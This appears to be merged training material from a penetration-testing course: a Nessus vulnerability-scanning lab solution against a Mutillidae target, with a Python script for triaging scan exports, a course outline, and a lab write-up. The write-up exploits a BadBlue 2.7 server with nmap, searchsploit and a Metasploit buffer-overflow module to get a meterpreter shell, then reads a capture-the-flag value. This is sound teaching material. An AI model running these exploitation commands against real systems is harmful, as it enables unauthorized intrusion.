
Nessus Lab Merged

The document outlines a lab exercise using Nessus for vulnerability scanning on a target machine running the Mutillidae web application. It provides step-by-step instructions for accessing the Kali GUI, performing scans, analyzing vulnerabilities, and generating reports. Additionally, it includes information on setting up custom scans and exporting findings in various formats.

Uploaded by

itsmemario320
Copyright
© © All Rights Reserved

Nessus Lab

In this lab you will use Nessus to scan and perform vulnerability analysis of a target
machine running an instance of Mutillidae web application.

This exercise will help you understand how to perform vulnerability scanning using Nessus.

Lab Environment
In this lab environment, the user is going to get access to a Kali GUI instance. An instance of
the Mutillidae web application can be accessed using the tools installed on Kali
at http://demo.ine.local.

Objective: Perform vulnerability scan on the target machine using Nessus.

Relevant Information:
• Username: admin
• Password: adminpasswd

Tools
The best tools for this lab are:

• Nessus
• A web browser

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the
solutions before actually trying the concepts and techniques you studied in the
course will dramatically reduce the benefits of a hands-on lab!

Solution

Step 1: Open the lab link to access the Kali GUI instance.

Step 2: Launch the browser and open the Nessus dashboard.

The Nessus dashboard can be accessed by visiting the following URL:

URL: https://localhost:8834/

Note: If you visit http://localhost:8834/ instead of the HTTPS URL, then you would get the
following page:

Once the Nessus dashboard opens up, enter the credentials provided in the challenge
description:

Username: admin
Password: adminpasswd

Upon successful authentication, you would see the following screen:


Step 3: Scan the target machine at demo.ine.local using Nessus.

In the text area labeled as Targets, enter the target we wish to analyze using Nessus, that
is, demo.ine.local:

Once the target has been entered, you should see the following screen:

This is the result of the Host Discovery scan performed by Nessus. It shows the DNS name
as well as the IP address of the target machine.

Select the only host listed and click on the Run Scan button:

This would start a Basic Network Scan by default:


Notice that we can see the name, start time and the status of the scan on the right.

Once the scan is finished, you would notice the following screen:

You can see the scan status (Completed), scan duration as well as the vulnerabilities
discovered during this scan.

In this particular scan, 2 medium severity vulnerabilities were discovered. To get more
details about the vulnerabilities, click on the horizontal colored bar containing the
vulnerabilities of different severity and their respective counts.

That would open up the following page:

Here you can notice the different vulnerabilities discovered by this scan. To get more
details about a specific vulnerability, simply click on the entry for it and you would be taken
to a page like this:

This page would show you the vulnerability name, its severity, a short description, a
remediation strategy, and related advisories/links.

The output section on the same page might show you the steps or the URL to exploit or
confirm the vulnerability as well:

Head back to the previous page containing all the identified vulnerabilities in the scan by
clicking on the Back to Vulnerabilities link:

Step 4: Download the vulnerabilities report for the basic network scan.

We can even export the results in the form of a report which can be submitted to your
clients after a pentest, while reporting your findings.

This can be done by clicking on the Report button on the top-right corner of the page
containing all the discovered vulnerabilities for the scan under consideration:

You will get the following options to generate a report:

We will go with the defaults for now (a PDF report containing the complete list of
vulnerabilities by host) and click on the Generate Report button.

Once the report is downloaded, it should look something like this:

Step 5: Performing a custom scan using Nessus.

Now that we have performed a basic scan using Nessus, let's perform a custom scan.

The scan we will be performing would require some configuration from our end, but that
would be worth it in the end, since we would control the different parameters of the scan
instead of going with the default available templates.

So to create a custom scan, let's visit the My Scans tab located in the left pane:

Before we create a custom scan, let's see the results of another scan that's shown in bold.

Information: When you start Nessus, it performs 2 basic scans by default. For one of the
scans, we already saw the results. The results for the second scan were not yet explored.
That's why they are still in bold, that is, they are still unread!

Let's check these results as well:


As you can see in the above image, it's a simple host discovery scan which took only a few
seconds to conclude.

Now let's get back to the route we were on and create a new scan:

Once you are back on the My Scans screen, click on the New Scan button just below the
navbar:

For the sake of this lab, since we have Mutillidae running on the target machine, the
obvious scan template should be Web Application Tests. But instead of going with this
pre-available template, we will create a custom vulnerability scanning template using
the Advanced Scan template.

Select the Advanced Scan template and configure its settings:


Fill in a suitable name and description for the template and specify the target you wish to
scan. For this lab, the target would be demo.ine.local.

Next, we will configure the DISCOVERY -> Host Discovery settings:


We will uncheck the first option (which would test our local host for vulnerability scanning)
and we will check the second option (which would make our scans faster by trading off
accuracy).

Going with these options should be okay for our simple scenario, and the options you might
require would depend on the target/scenario you have. For instance, while scanning the
local machine for any vulnerabilities, you would want to keep the first option checked. And
if you wish to have reliability and reduce the false positives in your scans, then the second
option must be checked as well!

Next, we will configure the DISCOVERY -> Port Scanning settings:


Let's check the TCP option in the Network Port Scanners section in order to perform a
more accurate scan:

Next, we will configure the ASSESSMENT -> General settings:

Let's check the Perform thorough tests (may disrupt your network or impact
scan speed) option:

Next, we will configure the ASSESSMENT -> Web Applications settings:

Toggle the Scan web applications option:

Now, let's save the configuration we have so far. Scroll down and click on the Save button:

Now click on My Scans on the left panel and you should see the scan you just created in
the listing:

Step 6: Running the newly configured advanced scan.

Now it's time to run the newly configured scan and see which vulnerabilities we can get
from Nessus!

Click on the (greyed out) play button in front of the scan template we just configured,
highlighted in the following image:

Now our scan should be running:

Click on the scan entry and that should take us to the details page for this scan:

Here we can see the different vulnerabilities, categorized by their severity, as well as the scan
status and the timing details (when the scan got started, when it ended [if it ended], and the
time elapsed [again, it's shown once the scan ends]).

To get more details on the discovered vulnerabilities, click on the horizontal bar listing the
vulnerabilities. That should take us to the following page:

Now click on, say, the very first entry on the page, which is Phpmyadmin (Multiple
Issues) in our case.

Notice that there are 3 vulnerabilities in here and 2 of them are of HIGH severity!

Let's dig in and check the details on the first HIGH severity vulnerability among these:

This page shows more details on the selected vulnerability and the output section even lists
the URL which we can try out to verify if this vulnerability actually exists!

Let's open the specified URL http://demo.ine.local/phpmyadmin/:


Indeed we have an unprotected phpMyAdmin page! Feel free to take your time and exploit
the target machine using the unprotected phpMyAdmin page.

We will instead focus on analyzing the results of Nessus. So let's go back to the
vulnerabilities for this scan:

Let's check one more vulnerability entry:

In this case, there was a Git repository served by the Web Server!
The repository URL is shown in the Output section in the above image.

Let's verify if that's the case:

And indeed, there is an exposed Git repository! And notice that this repository doesn't
seem like a normal Git repository of the kind you clone from websites like GitHub. And
Nessus's output already reported that to us.

Now let's head back to the vulnerabilities page. So Nessus found these vulnerabilities
for the Mutillidae web application:

Step 7: Exporting the results of the custom scan.

Now let's export the findings in the form of an HTML page. Click on the Report button just
below the navbar.

We will set HTML as the Report Format and the Detailed Vulnerabilities by Host option
for the report template, as shown in the above image. And now we can generate the report
by clicking the Generate Report button.

The report should look something like this:

If you scroll down, you would notice the Host Information as well as the
various Vulnerabilities discovered by this scan. And the remediations are also included in
the details.

Scrolling through the list, you can see the information on the different vulnerabilities
reported by the configured custom Nessus scan:

In some cases, there is an output section as well which lists the URL or the output of
importance for the listed vulnerability, as shown for the Browsable Web
Directories vulnerability:

And that's how we can carry out basic as well as advanced (and custom-tailored)
vulnerability scans using Nessus!
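
The triage done by hand in Steps 6 and 7 (severity counts first, then the Output section of each finding) can also be run over an exported scan file. The following is an added example, not part of the original lab: it assumes the scan was exported in Nessus's XML (.nessus) format rather than the PDF and HTML reports used above, and the sample data, plugin IDs, plugin names and output text are constructed.

```python
import re
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample in the .nessus (NessusClientData_v2) layout. Plugin IDs,
# plugin names and output text are made up; only the phpMyAdmin URL is the lab's.
SAMPLE = """<NessusClientData_v2><Report name="custom-scan">
<ReportHost name="demo.ine.local">
  <ReportItem port="80" protocol="tcp" severity="3" pluginID="900001"
              pluginName="phpMyAdmin Installation Not Password Protected">
    <solution>Require authentication for phpMyAdmin.</solution>
    <plugin_output>Accessible without credentials:
      http://demo.ine.local/phpmyadmin/</plugin_output>
  </ReportItem>
  <ReportItem port="80" protocol="tcp" severity="2" pluginID="900002"
              pluginName="Git Repository Served by Web Server">
    <solution>Block web access to the repository directory.</solution>
    <plugin_output>Repository metadata is readable.</plugin_output>
  </ReportItem>
  <ReportItem port="80" protocol="tcp" severity="0" pluginID="900003"
              pluginName="HTTP Server Type and Version"/>
</ReportHost></Report></NessusClientData_v2>"""

SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}
URL_RE = re.compile(r"https?://[^\s<>\"']+")

def triage(nessus_xml, min_severity=2):
    """Count findings per severity and list those at or above min_severity."""
    root = ET.fromstring(nessus_xml)  # parse only exports from your own scanner
    counts, findings = Counter(), []
    for host in root.iter("ReportHost"):
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            counts[SEVERITY.get(sev, "Unknown")] += 1
            if sev < min_severity:
                continue
            findings.append({
                "host": host.get("name"), "port": int(item.get("port", "0")),
                "sev": sev, "plugin": item.get("pluginName"),
                "solution": (item.findtext("solution") or "").strip(),
                # URLs Nessus printed in the Output section, to confirm by hand
                "verify_urls": URL_RE.findall(item.findtext("plugin_output") or ""),
            })
    findings.sort(key=lambda f: f["sev"], reverse=True)  # worst first
    return counts, findings

if __name__ == "__main__":
    counts, findings = triage(SAMPLE)
    print(dict(counts))
    for f in findings:
        print(SEVERITY[f["sev"]], f["host"], f["port"], f["plugin"], f["verify_urls"])
```

Raising `min_severity` to 3 limits the list to High and Critical findings, which is a reasonable first cut when a thorough scan returns many entries.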

INE
Assessment Methodologies: Vulnerability Assessment

This course covers Vulnerability Assessment. Here in this course, you will learn about technical and
nontechnical vulnerabilities, as well as the system for tracking and researching vulnerabilities across
the cyber security community. Finding vulnerabilities and researching their criticality, importance, and
impact on the client are critical for a cyber security professional. As a pentester, finding and exploiting
vulnerabilities to further emulate adversaries is at the heart of the matter. Then reporting and relating
to the business is where the value lies.
Instructor: Josh Mason
Course duration: 2h 46m
Course files: INe-Assessment-Methodologies-Vulnerability-Assessment-Course-File.zip

Course outline

Welcome
• Introduction (1 activity)
  - Course Introduction (video, 2m 14s)

Vulnerability Assessment
• Vulnerability Overview (2 activities)
  - Vulnerabilities (video, 28m 49s)
  - Test your knowledge: Vulnerabilities (quiz, 10 questions)
• Vulnerability Case Studies (1 activity)
  - Case Studies (video, 39m 13s)

Course Labs
• Lab 1 (2 activities)
  - Nessus Lab (video, 6m 51s)
  - Nessus (lab, Cyber Security)
• Lab 2 (2 activities)
  - Vulnerability Research Lab (video, 16m 21s)
  - Windows: Easy File Sharing Server (lab, Cyber Security)

Goodbye
• Conclusion (1 activity)
  - Course Conclusion (video, 2m 54s)

Name: Vulnerable Easy File Sharing Server
URL: https://attackdefense.com/challengedetails?cid=1944
Type: Windows Exploitation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the "target" file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap -Pn 10.0.0.77

Step 3: We have discovered that multiple ports are open. We will run nmap again to determine
version information on port 80.

Command: nmap -sV -p 80 10.0.0.77

Step 4: We will search for an exploit module for badblue 2.7 using searchsploit.

Command: searchsploit badblue 2.7

Step 5: There is a Metasploit module for the badblue server. We will use the PassThru remote buffer
overflow Metasploit module to exploit the target.

Commands:
msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.0.77
exploit

We have successfully exploited the target vulnerable application (badblue) and received a
meterpreter shell.

Step 6: Searching for the flag.

Commands:
shell
cd /
dir
type flag.txt

This reveals the flag to us.

Flag: 70a569da306697d64fc6c19afea37d94

References

1. BadBlue 2.72b - Multiple Vulnerabilities (https://www.exploit-db.com/exploits/4715)
2. Metasploit Module (https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)
